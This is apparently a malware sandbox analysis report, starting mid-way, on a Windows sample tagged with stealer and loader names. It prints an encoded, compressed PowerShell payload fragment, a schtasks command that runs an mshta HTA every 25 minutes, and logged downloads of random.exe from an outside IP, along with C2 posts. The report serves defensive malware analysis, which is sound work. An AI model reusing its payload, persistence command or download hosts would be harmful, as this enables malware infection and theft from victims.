AHMASQAzAGQAUABKAEYAQQB5AE0AeQBTAFAAcABTAEUAagBqAHgAVwBNAHMAVAA0ADkASwA0AE0AQgBZADkAUwB2AC8ANwB5AG4ANAB5AHIAbwBNADMAcABlAEIAVwA4AFoASQBzADMARwBRAGwAdwBtAHEAZABMAEcAYQBYADgASABMAFUARQBjADkAOQB2AHUAUABEAFAAYwBJAEEARQBVAHkAQwB3AEoARgBuAEIAagBOAFAAbQBVAGcAcgB6AFIAQwBrAHYASQBuAEkAcQByAG8AQQB1AGwAQgBGAG4AUgBLAHYAdgBoAHYAaABhAHYAMgB1AFUATABsAGMARgBIAEwAawBNAEIAagBpAFUAbwBYAG8AMQBnAE4AMwB5AEoAdABjAG0ANQBHAEEAbQBoAGcAdgBQAGkATgB3AHkAMQB3AGEAYQB3AGUAdQBEADEAcwBEAGkAcwB6AEsAOAA2AE4AbQBDADcAdgBvAFoARQA2AFYAVQBEAHoAVwBKAGwAWQBEAFoALwBKAGwASwA1AFYAZQBOAEEATQB0AHMAUAAwAGgAawBJAFQARwBOAEgAbgAyADMAMAAzADEAdwBYAEkAcwArAGkAUwAvAFMATgB6AG8AUABTAGoAVAA0AFAASQB2AGcAWAA0AGEASABpACsAQgBxADQAZwBRAG0AZQBtAFkASABiAEMASgBQAHcANwB3AEwAWgBuAEcAKwBDAFIAVAAwAFIAYgBQAEwAUQBmAFgAYQA5AEoAYQB1AGEAbQBOAFIARwBUAEQAYwBLAGgATwA2AFQAMwBSAEYANQAyADMAWQBkAHIAYwAvAFcALwBuAHEAOABQAHEAZgAzAFgARwBSAEEAMAB4AEkAdgB2AG4AYwBpAHoANgB2AFgAOQA3ADcAaABGAFgATQAxAG0AQgB3AGIAcQBOAFkATQBMAFYARABpAHYAWABCAFoAUgBMAGUAMgAwAEsAbwBBAE4AKwB4AGQAZwBWAHkAYQBpAEwATABpAEcATwAvAGEAbQBoAFYAOQBIAEQAQQBiAE0ATQB1AFUANwBEAEkAOQBiAGQAcwAvAGMAbwBjADcAegBEACsAcgBwAHQAUwBRADQATAA0ADMAZgAzAGcAaQBvAGcAbAAxAHIAQwByAGIAeABBAE4AVwBlAFUARwA1AGUAOABEAHgAegBTAG4AaABIADQAYwBsAGUAbwBPADkAUwAvAHoAdwBaAFYAOABsADgAdQBOACsANQBCAEsAeQAyAFYAaQBOAFYAZQA4AEgAdABDAEkAWQByADgARgBOAHUAMABJAHcASgBOAGoATgB0ADgAKwA3AEYAcwBFAGMASQBrAEwAegBKAEgAYQBGAGMAMQBoAFoAKwA1AFIAMAByADcAaABjADUAbgB3AEoAeABKADkARwBYAEsAZQB0AG8AMAA3AG8AegBYAHcAbABIADAAQwBiACsAYwBuAEoAaABWAGIASgBHAGMALwBnADMAVwBCAHEATgBEADcAcwBqAHYATQBCAFQAQgBmAG4ARABhAEEAQQAzAFEAbAAvAEoASgAyAEYANgArAEsAMQB1AHMAUABWAEUAMgBkAFcAbgB2AGwAeABmADkANwBoAHQAQgBQAGkANwAxADgAPQAnACAAKQAsACAAWwBzAHkAUwBUAGUATQAuAEkAbwAuAEMATwBtAFAAcgBlAFMAcwBpAE8ATgAuAGMATwBtAHAAcgBlAFMAUwBpAE8AbgBNAG8AZABlAF0AOgA6AGQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAIAAlACAAewAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAEkATwAuAHMAdABSAGUAYQBtAHIAZQBhAGQARQBSACgAIAAkAF8ALABbAFMAWQBTAFQAZQBtAC4AVABlAHgAdAAuAGUAbgBjAG8ARABpAE4ARwBdADoAOgBBAHMAYwBpAEkAIAApAH0AIAB8ACAAJQAgAHsAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApACAAfQApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
720schtasks /create /tn Cp7LImaM7bg /tr "mshta C:\Users\admin\AppData\Local\Temp\NmwZxmbad.hta" /sc minute /mo 25 /ru "admin" /fC:\Windows\SysWOW64\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
732"C:\Users\admin\Desktop\Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe" C:\Users\admin\Desktop\Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\psapi.dll
c:\windows\syswow64\user32.dll
Total events
388 112
Read events
386 314
Write events
1 628
Delete events
170

Modification events

(PID) Process:(7408) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7408) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7408) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7556) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7556) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7556) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7556) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7556) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7556) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7556) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
67
Suspicious files
385
Text files
404
Unknown types
1

Dropped files

PID
Process
Filename
Type
4208firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin
MD5:
SHA256:
43362025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exeC:\Users\admin\AppData\Local\Temp\n1PHWk82U.htahtml
MD5:838558A679B7A9EFD8891A3653BF7578
SHA256:640B121A15D7B9B9A9D7D6299654A755B86666E047095922D7B6D4737752D458
7556powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:9CB6261516F70E672D40E882C2A87E34
SHA256:4D5269737AD3BC9DD50FDE7B7DAEAC0E4B2ABEB8482D4E99BCFA6E619E6ED979
7320powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_50yoqnjx.ii5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7556powershell.exeC:\Users\admin\AppData\Local\TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXEexecutable
MD5:26CC5A6CFD8E8ECC433337413C14CDDB
SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8
7320powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_syml1qud.pvi.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
22842025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exeC:\Users\admin\AppData\Local\Temp\1xwleVEG6.htahtml
MD5:09E727CFC148831B5DC862E04D8299F1
SHA256:A027A459CE00DF325E7EACF32C68D068A6E0C75B7EDD42F285D815ABB90E19E9
7556powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jqbrivwx.qdf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
780TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXEC:\Windows\Tasks\ramez.jobbinary
MD5:94BB8FF3948C71F5757307E8B281805F
SHA256:0FF2019B878442661787A35483FA7ECAD8F4368E6798E1A51526F15AA875EA70
6300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_53fbvugv.hlt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
70
TCP/UDP connections
247
DNS requests
260
Threats
102

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.169:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7556
powershell.exe
GET
200
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6300
powershell.exe
GET
200
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
7320
powershell.exe
GET
200
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
7480
ramez.exe
GET
200
185.156.72.2:80
http://185.156.72.2/files/unique1/random.exe
unknown
unknown
7480
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
4208
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
whitelisted
7480
ramez.exe
POST
200
185.156.72.96:80
http://185.156.72.96/te4h2nus/index.php
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.169:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7556
powershell.exe
185.156.72.2:80
Tov Vaiz Partner
RU
unknown
6544
svchost.exe
20.190.159.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.169
  • 23.48.23.176
  • 23.48.23.173
  • 23.48.23.141
  • 23.48.23.150
  • 23.48.23.146
  • 23.48.23.159
  • 23.48.23.147
  • 23.48.23.140
  • 23.48.23.192
  • 23.48.23.183
  • 23.48.23.161
  • 23.48.23.190
  • 23.48.23.168
  • 23.48.23.138
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
google.com
  • 216.58.206.78
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.159.131
  • 40.126.31.67
  • 20.190.159.23
  • 40.126.31.130
  • 40.126.31.129
  • 40.126.31.131
  • 40.126.31.1
  • 20.190.159.130
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 2.23.77.188
whitelisted
detectportal.firefox.com
  • 34.107.221.82
whitelisted
prod.detectportal.prod.cloudops.mozgcp.net
  • 34.107.221.82
  • 2600:1901:0:38d7::
whitelisted
example.org
  • 23.215.0.133
  • 96.7.128.192
  • 96.7.128.186
  • 23.215.0.132
whitelisted

Threats

PID
Process
Class
Message
7556
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
7556
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7556
powershell.exe
Misc activity
ET INFO Packed Executable Download
7556
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
7556
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7556
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 34
7320
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7320
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
7320
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
7320
powershell.exe
Misc activity
ET INFO Packed Executable Download
No debug info